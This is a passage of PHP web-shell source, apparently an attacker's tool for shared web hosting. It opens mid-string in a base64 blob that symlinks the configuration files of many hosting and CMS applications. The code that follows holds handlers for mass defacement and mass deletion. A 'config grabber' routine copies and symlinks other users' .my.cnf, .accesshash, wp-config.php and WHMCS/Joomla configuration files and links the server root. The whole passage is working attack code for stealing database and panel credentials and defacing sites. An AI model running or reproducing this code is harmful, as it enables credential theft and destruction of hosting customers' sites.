sKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdXBwb3J0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHAudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG1jcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictcGFuZWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0cy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudGUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50c3VwcG9ydC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21hbmFnZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1tYW5hZ2UudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXkvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXkudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy16ZW5jYXJ0LnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC16ZW5jYXJ0LnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvU2V0dGluZ3MucGhwJywkc2l0ZXNzLictc21mLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NtZi9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYyLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvU2V0dGluZ3MucGhwJywkc2l0ZXNzLictc21mLWZvcnVtcy50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cGxvYWQvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXVwLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdXAvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXVwMi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZfZ2xvYmFsLnBocCcsJHNpdGVzcy4nLTYudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25uZWN0LnBocCcsJHNpdGVzcy4nLVBIUC1GdXNpb24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ta19jb25mLnBocCcsJHNpdGVzcy4nLTkudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdHJhaWRudDEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NpdGVzL2RlZmF1bHQvc2V0dGluZ3MucGhwJywkc2l0ZXNzLictRHJ1cGFsLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVyL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictMW1lbWJlci50eHQnKSA7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydHMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdXBwb3J0cy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtc3VwcG9ydHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtY2xpZW50LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0cy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGJpbGwvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGwudHh0Jyk7Cn0KcHJpbnQgIjxpbWcgc3JjPSdodHRwczovL2kuaWJiLmNvL0hWZlZWcVAvNjdmYTM1LTI1YzVhMGYzMDFkODQzMWRhMWFjZjZlY2Q2OWYwMmU0LnBuZycgIGhlaWdodD0nMzAwJz48YnI+PGJyPjxmb250IGNvbG9yPXJlZD5Eb25lICEhIDwvZm9udD4iOwo=";$file=fopen("W4r10k.cin","w+");$write=fwrite($file,base64_decode($config));fclose($file);chmod("W4r10k.cin",0755);echo"<a href='W4r10k/W4r10k.cin'><label class='btn btn-danger'>Click ME! To Acces.Cin File !!! (; !</label></a>";exit;} if($_POST['startindox']) { if($_POST['mass_type'] === 'singledir') { print "<div style='margin: 5px auto; padding: 5px'>"; massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']); print "</div>"; } elseif($_POST['mass_type'] === 'alldir') { print "<div style='margin: 5px auto; padding: 5px'>"; massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir"); print "</div>"; } elseif($_POST['mass_type'] === "delete") { print "<div style='margin: 5px auto; padding: 5px'>"; massdelete($_POST['d_dir'], $_POST['d_file']); print "</div>"; } elseif($_POST['mass_type'] === "massubdir") { print "<div style='margin: 5px auto; padding: 5px'>"; massdefacesubdir($_POST['d_dir'], $_POST['dsubdir'], $_POST['script'], $_POST['d_file']); print "</div>"; } } if ($_POST['conf']) { $home = $_POST['file_name']; $dir1 = $_POST['base_dir']; $folfig = 'yanz'; @mkdir($folfig, 0755); @chdir($folfig); $htaccess = $_POST['achon666ju5t']; file_put_contents(".htaccess",$htaccess,FILE_APPEND); $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){ $user=trim($pwd); symlink('/','000~ROOT~000'); copy('/'.$home.'/'.$user.'/.my.cnf',$user.' CPANEL'); symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' CPANEL'); copy('/'.$home.'/'.$user.'/.accesshash',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/.accesshash',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/suspended.page/index.html',$user.' RESELLER.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/suspended.page/index.html',$user.' RESELLER.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/.accesshash',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/configuration.php',$user.' WHMCS or JOOMLA.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/account/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/accounts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/buy/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/checkout/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/central/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/clienti/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/client/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/cliente/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/clientes/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/clients/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/clientarea/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/clientsarea/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/client-area/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/clients-area/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/clientzone/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/client-zone/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/core/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/company/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/customer/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/customers/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/bill/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/billing/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/finance/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/financeiro/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/host/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/hosts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/hosting/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/hostings/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/klien/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/manage/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/manager/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/member/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/members/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/my/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/myaccount/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/my-account/client/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/myaccounts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/my-accounts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/order/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/orders/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/painel/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/panel/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/panels/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/portal/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/portals/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/purchase/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/secure/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/support/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/supporte/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/supports/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/web/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/webhost/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/webhosting/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/whm/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/whmcs/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/whmcs2/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/Whm/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/Whmcs/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/WHM/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/WHMCS/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/configuration.php',$user.' WHMCS or JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/account/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/accounts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/buy/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/checkout/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/central/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/clienti/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/client/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/cliente/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/clientes/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/clients/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/clientarea/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/clientsarea/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/client-area/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/clients-area/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/clientzone/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/client-zone/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/core/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/company/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/customer/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/customers/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/bill/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/billing/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/finance/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/financeiro/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/host/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/hosts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/hosting/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/hostings/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/klien/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/manage/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/manager/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/member/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/members/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/my/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/myaccount/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/my-account/client/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/myaccounts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/my-accounts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/order/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/orders/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/painel/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/panel/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/panels/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/portal/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/portals/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/purchase/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/secure/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/support/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/supporte/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/supports/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/web/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/webhost/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/webhosting/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/whm/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/whmcs/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/whmcs2/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/Whm/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/Whmcs/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/WHM/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/'.$dir1.'/WHMCS/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/wp/test/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/blog/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/beta/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/portal/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/site/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/wp/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/WP/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/news/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/wordpress/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/test/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/'.$dir1.'/demo/wp-config.php',$user.'WORDPRESS.txt'); 